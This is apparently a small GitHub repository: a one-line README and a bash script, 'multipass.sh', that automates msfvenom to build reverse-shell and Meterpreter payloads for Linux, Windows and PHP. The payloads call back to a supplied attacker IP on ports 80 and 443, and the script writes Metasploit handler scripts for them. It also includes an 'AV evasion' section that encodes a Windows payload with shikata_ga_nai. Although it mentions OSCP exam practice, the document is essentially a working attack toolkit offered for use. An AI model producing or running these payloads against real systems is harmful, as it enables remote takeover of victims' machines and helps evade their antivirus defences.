├── README.md └── multipass.sh /README.md: -------------------------------------------------------------------------------- 1 | # multipass 2 | 3 | Just my lazy way to get my payloads done without remembering all the msfvenom options 4 | -------------------------------------------------------------------------------- /multipass.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo " __ __ _ _ _ _____ ___ ____ _ ____ ____" 3 | echo "| \/ | | | | | |_ _|_ _| _ \ / \ / ___/ ___|" 4 | echo "| |\/| | | | | | | | | || |_) / _ \ \___ \___ \ " 5 | echo "| | | | |_| | |___| | | || __/ ___ \ ___) |__) |" 6 | echo "|_| |_|\___/|_____|_| |___|_| /_/ \_\____/____/" 7 | echo "" 8 | echo "Usage: Multipass KaliboxIP" 9 | echo "Alternative use Multipass eth0 or tap0" 10 | echo "Use msfconsole -r NAMEOFTHEPAYLOAD.rc to set up the handler for the payload" 11 | echo "---------------------------------------------------------------------------------" 12 | 13 | echo "Thx Unfo for the original Idea" 14 | echo "Thx for the discord crowd for the kick to do it in a propper way" 15 | 16 | echo "---------------------------------------------------------------------------------" 17 | echo " Version 3.0 Date: 19.06.2018" 18 | echo "Changes: basic AV evasion, and handler setup scripts" 19 | echo "---------------------------------------------------------------------------------" 20 | echo "mp payloads = METERPRETER = UNSAFE for the OSCP Exam .. just saying" 21 | echo "ave payloads = tend to work against basic AV and Firewalls. For better payloads we need veil evasion framework. For that there will be a extra version of multipass soon (TM) " 22 | mkdir ./$@ 23 | mkdir ./$@/linux 24 | mkdir ./$@/windows 25 | mkdir ./$@/php 26 | 27 | echo "###################### Reverse TCP MP Linux Port 80 and 443 #################" 28 | msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=$@ LPORT=443 -f elf -o ./$@/linux/linux_x86_mp_rev_tcp_p443.elf 29 | 30 | 31 | msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=$@ LPORT=443 -f c -o ./$@/linux/linux_x86_mp_rev_tcp_p443.c 32 | 33 | 34 | msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=$@ LPORT=80 -f elf -o ./$@/linux/linux_x86_mp_rev_tcp_p80.elf 35 | 36 | 37 | msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=$@ LPORT=80 -f c -o ./$@/linux/linux_x86_mp_rev_tcp_p80.c 38 | #RC File for MP 443 and Port 80 39 | #Port 443 40 | touch ./$@/linux/linux_x86_mp_rev_tcp_p443.rc 41 | echo use exploit/multi/handler >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc 42 | echo set PAYLOAD linux/x86/meterpreter/reverse_tcp >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc 43 | echo set LHOST $@ >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc 44 | echo set LPORT 443 >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc 45 | echo set ExitOnSession false >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc 46 | echo exploit -j -z >> ./$@/linux/linux_x86_mp_rev_tcp_p443.rc 47 | #Port 80 48 | touch ./$@/linux/linux_x86_mp_rev_tcp_p80.rc 49 | echo use exploit/multi/handler >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc 50 | echo set PAYLOAD linux/x86/meterpreter/reverse_tcp >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc 51 | echo set LHOST $@ >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc 52 | echo set LPORT 80 >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc 53 | echo set ExitOnSession false >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc 54 | echo exploit -j -z >> ./$@/linux/linux_x86_mp_rev_tcp_p80.rc 55 | 56 | echo "###################### Reverse Shell Linux X86 Port 80 and 443 #################" 57 | msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=$@ LPORT=443 -f elf -o ./$@/linux/linux_X86_shell_rev_tcp_p443.elf 58 | msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=$@ LPORT=443 -f c -o ./$@/linux/linux_X86_shell_rev_tcp_p443.c 59 | 60 | msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=$@ LPORT=80 -f elf -o ./$@/linux/linux_X86_shell_rev_tcp_p80.elf 61 | msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=$@ LPORT=80 -f c -o ./$@/linux/linux_X86_shell_rev_tcp_p80.c 62 | 63 | #RC File for Shell 443 and Port 80 64 | #Port 80 65 | touch ./$@/linux/linux_X86_shell_rev_tcp_p80.rc 66 | echo use exploit/multi/handler >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc 67 | echo set PAYLOAD linux/x86/shell_reverse_tcp >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc 68 | echo set LHOST $@ >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc 69 | echo set LPORT 80 >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc 70 | echo set ExitOnSession false >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc 71 | echo exploit -j -z >> ./$@/linux/linux_X86_shell_rev_tcp_p80.rc 72 | #Port 443 73 | touch ./$@/linux/linux_X86_shell_rev_tcp_p443.rc 74 | echo use exploit/multi/handler >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc 75 | echo set PAYLOAD linux/x86/shell_reverse_tcp >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc 76 | echo set LHOST $@ >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc 77 | echo set LPORT 443 >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc 78 | echo set ExitOnSession false >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc 79 | echo exploit -j -z >> ./$@/linux/linux_X86_shell_rev_tcp_p443.rc 80 | 81 | echo "###################### Reverse MP Windows x86 Port 80 and 443 #################" 82 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$@ LPORT=443 -f exe -o ./$@/windows/win_X86_mp_rev_tcp_p443.exe 83 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$@ LPORT=443 -f c -o ./$@/windows/win_X86_mp_rev_tcp_p443.c 84 | 85 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$@ LPORT=80 -f exe -o ./$@/windows/win_X86_mp_rev_tcp_p80.exe 86 | msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$@ LPORT=80 -f c -o ./$@/windows/win_X86_mp_rev_tcp_p80.c 87 | 88 | #RC File for Shell 443 and Port 80 89 | #Port 443 90 | touch ./$@/windows/win_X86_mp_rev_tcp_p443.rc 91 | echo use exploit/multi/handler >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc 92 | echo set PAYLOAD windows/meterpreter/reverse_tcp >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc 93 | echo set LHOST $@ >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc 94 | echo set LPORT 443 >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc 95 | echo set ExitOnSession false >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc 96 | echo exploit -j -z >> ./$@/windows/win_X86_mp_rev_tcp_p443.rc 97 | #Port 80 98 | touch ./$@/windows/win_X86_mp_rev_tcp_p80.rc 99 | echo use exploit/multi/handler >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc 100 | echo set PAYLOAD windows/meterpreter/reverse_tcp >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc 101 | echo set LHOST $@ >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc 102 | echo set LPORT 80 >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc 103 | echo set ExitOnSession false >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc 104 | echo exploit -j -z >> ./$@/windows/win_X86_mp_rev_tcp_p80.rc 105 | 106 | echo "###################### Reverse x86 Shell Windows Port 80 and 443 #################" 107 | msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=$@ LPORT=443 -f exe -o ./$@/windows/win_X86_shell_rev_tcp_p443.exe 108 | msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=$@ LPORT=443 -f c -o ./$@/windows/win_X86_shell_rev_tcp_p443.c 109 | 110 | msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=$@ LPORT=80 -f exe -o ./$@/windows/win_X86_shell_rev_tcp_p80.exe 111 | msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=$@ LPORT=80 -f c -o ./$@/windows/win_X86_shell_rev_tcp_p80.c 112 | 113 | #RC File for Shell 443 and Port 80 114 | #Port 443 115 | touch ./$@/windows/win_X86_shell_rev_tcp_p443.rc 116 | echo use exploit/multi/handler >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc 117 | echo set PAYLOAD windows/meterpreter/reverse_tcp >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc 118 | echo set LHOST $@ >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc 119 | echo set LPORT 443 >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc 120 | echo set ExitOnSession false >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc 121 | echo exploit -j -z >> ./$@/windows/win_X86_shell_rev_tcp_p443.rc 122 | #Port 80 123 | touch ./$@/windows/win_X86_shell_rev_tcp_p80.rc 124 | echo use exploit/multi/handler >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc 125 | echo set PAYLOAD windows/meterpreter/reverse_tcp >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc 126 | echo set LHOST $@ >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc 127 | echo set LPORT 80 >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc 128 | echo set ExitOnSession false >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc 129 | echo exploit -j -z >> ./$@/windows/win_X86_shell_rev_tcp_p80.rc 130 | echo "###################### Reverse PHP MP Port 80 and 443 #################" 131 | echo " ./$@/php/php_mp_rev_tcp_p80.php 132 | msfvenom -p php/meterpreter_reverse_tcp LHOST=$@ LPORT=80 -f raw >> ./$@/php/php_mp_rev_tcp_p80.php 133 | echo "?>" >> ./$@/php/php_mp_rev_tcp_p80.php 134 | 135 | echo " ./$@/php/php_mp_rev_tcp_p443.php 136 | msfvenom -p php/meterpreter_reverse_tcp LHOST=$@ LPORT=443 -f raw >> ./$@/php/php_mp_rev_tcp_p443.php 137 | echo "?>" >> ./$@/php/php_mp_rev_tcp_p443.php 138 | #RC File for Shell 443 and Port 80 139 | #Port 443 140 | touch ./$@/php/php_mp_rev_tcp_p443.rc 141 | echo use exploit/multi/handler >> ./$@/php/php_mp_rev_tcp_p443.rc 142 | echo set PAYLOAD php/meterpreter_reverse_tcp >> ./$@/php/php_mp_rev_tcp_p443.rc 143 | echo set LHOST $@ >> ./$@/php/php_mp_rev_tcp_p443.rc 144 | echo set LPORT 443 >> ./$@/php/php_mp_rev_tcp_p443.rc 145 | echo set ExitOnSession false >> ./$@/php/php_mp_rev_tcp_p443.rc 146 | echo exploit -j -z >> ./$@/php/php_mp_rev_tcp_p443.rc 147 | #Port 80 148 | touch ./$@/php/php_mp_rev_tcp_p80.rc 149 | echo use exploit/multi/handler >> ./$@/php/php_mp_rev_tcp_p80.rc 150 | echo set PAYLOAD php/meterpreter_reverse_tcp >> ./$@/php/php_mp_rev_tcp_p80.rc 151 | echo set LHOST $@ >> ./$@/php/php_mp_rev_tcp_p80.rc 152 | echo set LPORT 80 >> ./$@/php/php_mp_rev_tcp_p80.rc 153 | echo set ExitOnSession false >> ./$@/php/php_mp_rev_tcp_p80.rc 154 | echo exploit -j -z >> ./$@/php/php_mp_rev_tcp_p80.rc 155 | echo "###################### Reverse PHP Shell Port 80 and 443 #################" 156 | echo " ./$@/php/php_rev_tcp_p80.php 157 | msfvenom -p php/reverse_php LHOST=$@ LPORT=80 -f raw >> ./$@/php/php_rev_tcp_p80.php 158 | echo "?>" >> ./$@/php/php_rev_tcp_p80.php 159 | 160 | 161 | 162 | echo " ./$@/php/php_rev_tcp_p443.php 163 | msfvenom -p php/reverse_php LHOST=$@ LPORT=443 -f raw >> ./$@/php/php_rev_tcp_p443.php 164 | echo "?>" >> ./$@/php/php_rev_tcp_p443.php 165 | 166 | #RC File for Shell 443 and Port 80 167 | #Port 443 168 | touch ./$@/php/php_rev_tcp_p443.rc 169 | echo use exploit/multi/handler >> ./$@/php/php_rev_tcp_p443.rc 170 | echo set PAYLOAD php/reverse_php >> ./$@/php/php_rev_tcp_p443.rc 171 | echo set LHOST $@ >> ./$@/php/php_rev_tcp_p443.rc 172 | echo set LPORT 443 >> ./$@/php/php_rev_tcp_p443.rc 173 | echo set ExitOnSession false >> ./$@/php/php_rev_tcp_p443.rc 174 | echo exploit -j -z >> ./$@/php/php_rev_tcp_p443.rc 175 | #Port 80 176 | touch ./$@/php/php_rev_tcp_p80.rc 177 | echo use exploit/multi/handler >> ./$@/php/php_rev_tcp_p80.rc 178 | echo set PAYLOAD php/reverse_php >> ./$@/php/php_rev_tcp_p80.rc 179 | echo set LHOST $@ >> ./$@/php/php_rev_tcp_p80.rc 180 | echo set LPORT 80 >> ./$@/php/php_rev_tcp_p80.rc 181 | echo set ExitOnSession false >> ./$@/php/php_rev_tcp_p80.rc 182 | echo exploit -j -z >> ./$@/php/php_rev_tcp_p80.rc 183 | echo "//////////////////////////AV EVASION PAYLOADS ETC \\\\\\\\\\\\\\\\\\\\\\\\" 184 | msfvenom -a x86 --platform windows -a x64 -p windows/x64/meterpreter_reverse_https --encoder x86/shikata_ga_nai LHOST=$@ LPORT=443 -f exe -o ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.exe 185 | 186 | msfvenom -a x86 --platform windows -a x64 -p windows/x64/meterpreter_reverse_https --encoder x86/shikata_ga_nai LHOST=$@ LPORT=443 -f c -o ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.c 187 | 188 | #RC File for Shell 443 189 | #Port 443 190 | touch ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc 191 | echo use exploit/multi/handler >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc 192 | echo set PAYLOAD windows/x64/meterpreter_reverse_https >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc 193 | echo set LHOST $@ >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc 194 | echo set LPORT 443 >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc 195 | echo set ExitOnSession false >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc 196 | echo exploit -j -z >> ./$@/windows/win_x64_mp_stageless_AVE_rev_tcp_p443.rc 197 | --------------------------------------------------------------------------------